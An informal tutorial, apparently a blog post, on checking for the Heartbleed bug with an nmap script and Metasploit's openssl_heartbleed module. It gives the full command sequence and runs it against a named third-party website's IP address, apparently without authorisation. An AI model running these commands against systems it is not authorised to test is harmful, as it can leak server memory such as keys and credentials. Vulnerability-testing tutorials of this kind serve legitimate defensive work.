Heartbleed Hacking With Metasploit And Test With Nmap

---

Recently we just hear  new bug call HeartBleed. Today will not talk about what is Heartbleed and what they can do to us. I just wanna show you how to test your system or website. Are they are affected with HeartBleed bug.

First of all install your computer with nmap and metasploit
How to install it?
NMAP - http://nmap.org/
METASPLOIT - http://www.metasploit.com/

After install all this two application. you need to install nmap script. This script use for check vulnarable is the web for this example HeartBleed

Nmap location directory:

Windows
either C:\Program Files\Nmap\ or C:\Program Files (x86)\Nmap\
Linux
/usr/share/nmap/ or /usr/local/share/nmap/.

Then download this 2 files.
https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
https://svn.nmap.org/nmap/nselib/tls.lua



Example on my computer:







Code
cd /usr/share/nmap/scripts/
sudo wget https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
cd /usr/share/nmap/nselib/
sudo wget https://svn.nmap.org/nmap/nselib/tls.lua
nmap --script-updatedb  After install and update your nmap

Update you metasploit

sudo msfupdate


Now all done. Lets test some web :)

So it work. hahahaha.. Now lets test it with metasploit
Note: for the nmap we can see the ip of 1mclub.com which is 202.71.110.82 so we use that ip
Code: sudo msfconsole
msf > use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 202.71.110.82
set RPORT 443
set VERBOSE true
exploit

So it work :3



Please subribe my youtube channel http://www.youtube.com/user/GaaraChuninNSM

---